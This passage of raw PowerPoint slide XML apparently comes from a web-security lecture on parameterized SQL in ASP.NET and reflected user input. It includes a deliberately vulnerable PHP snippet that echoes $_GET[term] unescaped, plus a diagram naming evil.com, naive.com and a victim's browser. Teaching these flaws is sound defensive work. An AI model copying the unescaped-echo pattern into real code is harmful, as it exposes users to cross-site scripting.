                </a:solidFill>
              </a:rPr>
              <a:t>cmd.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Title 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6C444B-EA9B-4542-9264-A0E0F552745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Parameterized SQL in ASP.NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272606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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6C444B-EA9B-4542-9264-A0E0F552745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Echoing or “Reflecting” User Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D6D8470-E5C2-6D4B-B5DD-F9B4F614777F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7699424" y="3269669"/>
            <a:ext cx="1274763" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBC3824-34F4-D148-AD77-C3DAB6BE41E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7140059" y="3416425"/>
            <a:ext cx="1518970" cy="517526"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C92AFF-68FC-1F48-AEDD-DE965067617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2946503"/>
            <a:ext cx="6096000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php?term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“Britney Spears”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA0ED74B-DFE7-7C44-B97F-6F5FCE172A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044059" y="3933951"/>
            <a:ext cx="6096000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt; &lt;title&gt;Search results&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;You have searched for &lt;?php echo $_GET[term] ?&gt;… &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C11B5335-07D8-4745-A465-1428C70A0385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6168444" y="3147565"/>
            <a:ext cx="1030680" cy="1110240"/>
            <a:chOff x="6168444" y="2315053"/>
            <a:chExt cx="1030680" cy="111024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583A1FDC-AF65-C940-A7F3-7A9BEE521156}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6168444" y="2315053"/>
                <a:ext cx="1030680" cy="1090080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{583A1FDC-AF65-C940-A7F3-7A9BEE521156}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6150444" y="2297053"/>
                  <a:ext cx="1066320" cy="112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B7EFD9F2-ECD1-0045-98E8-32791B397D71}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6362484" y="3398293"/>
                <a:ext cx="157320" cy="27000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EFD9F2-ECD1-0045-98E8-32791B397D71}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6344484" y="3380293"/>
                  <a:ext cx="192960" cy="62640"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{812F4F6E-C49F-3F4F-BBE8-2C0DF72428A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7140059" y="5021196"/>
            <a:ext cx="1518970" cy="517526"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B10ED883-2F2B-674A-8D8E-AEFB5CF65F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361135" y="5021196"/>
            <a:ext cx="2725426" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.cgi?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB570C10-8A56-824A-B8A5-798EEE971BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361135" y="5676319"/>
            <a:ext cx="3669594" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;Welcome, dear Bob&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A841744B-D20D-4B45-8E98-2F7A7C37396B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6030204" y="5140885"/>
            <a:ext cx="1258560" cy="629640"/>
            <a:chOff x="6030204" y="4308373"/>
            <a:chExt cx="1258560" cy="629640"/>
          </a:xfrm>
        </p:grpSpPr>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E2C8DE0C-DFC1-CA4D-9E30-626CADDB623A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6038124" y="4308373"/>
                <a:ext cx="1250640" cy="569880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="15" name="Ink 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C8DE0C-DFC1-CA4D-9E30-626CADDB623A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6020124" y="4290733"/>
                  <a:ext cx="128628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BC0E4122-99FF-A04D-848D-62D52EA34CF1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6030204" y="4885453"/>
                <a:ext cx="176400" cy="52560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0E4122-99FF-A04D-848D-62D52EA34CF1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6012564" y="4867813"/>
                  <a:ext cx="212040" cy="88200"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Classic Blunders — Moments Before Mass">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C788540-6349-7240-87E4-75D68125F2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1522" y="631145"/>
            <a:ext cx="3195553" cy="224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96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ext Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E956BC53-3E34-0144-A9E7-514546980635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4640239" y="1685855"/>
            <a:ext cx="2819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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>victim’s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70661" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4084F8C2-1451-884B-9BA0-3AB1F17FBD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839200" y="1905000"/>
            <a:ext cx="1274708" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258501" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7163B29-6BA2-1C4C-99D3-4B49D0F98E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="2422526"/>
            <a:ext cx="2819400" cy="320675"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258502" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF317B90-339C-8B41-9EBF-3B83EF9B83BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162801" y="2362201"/>
            <a:ext cx="912813" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70664" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{081AFD9D-32D6-794B-92FB-1EDE31E27A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2438401"/>
            <a:ext cx="838200" cy="37941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70665" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A49E1DF-BE8E-AC44-ADA5-4BE9FA0EB6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1843344" y="1970687"/>
            <a:ext cx="10631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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70666" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25105777-90F8-2D40-B8D7-E2ECAB795A20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2438401"/>
            <a:ext cx="609600" cy="37941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sp>
        <p:nvSpPr>
          <p:cNvPr id="70667" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{570993DA-2951-5143-8B06-DFEF7C97AFC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9144000" y="2378076"/>
            <a:ext cx="838200" cy="37941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latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75DFA902-6B4E-0E46-9463-5024FC95E53E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2895600"/>
            <a:ext cx="2895600" cy="381000"/>
            <a:chOff x="816" y="1824"/>
            <a:chExt cx="1824" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70696" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C61B804-D73A-8445-B2BA-900129C0C274}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="1920"/>
              <a:ext cx="1824" cy="144"/>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0995" name="Text Box 13">
              <a:extLst>
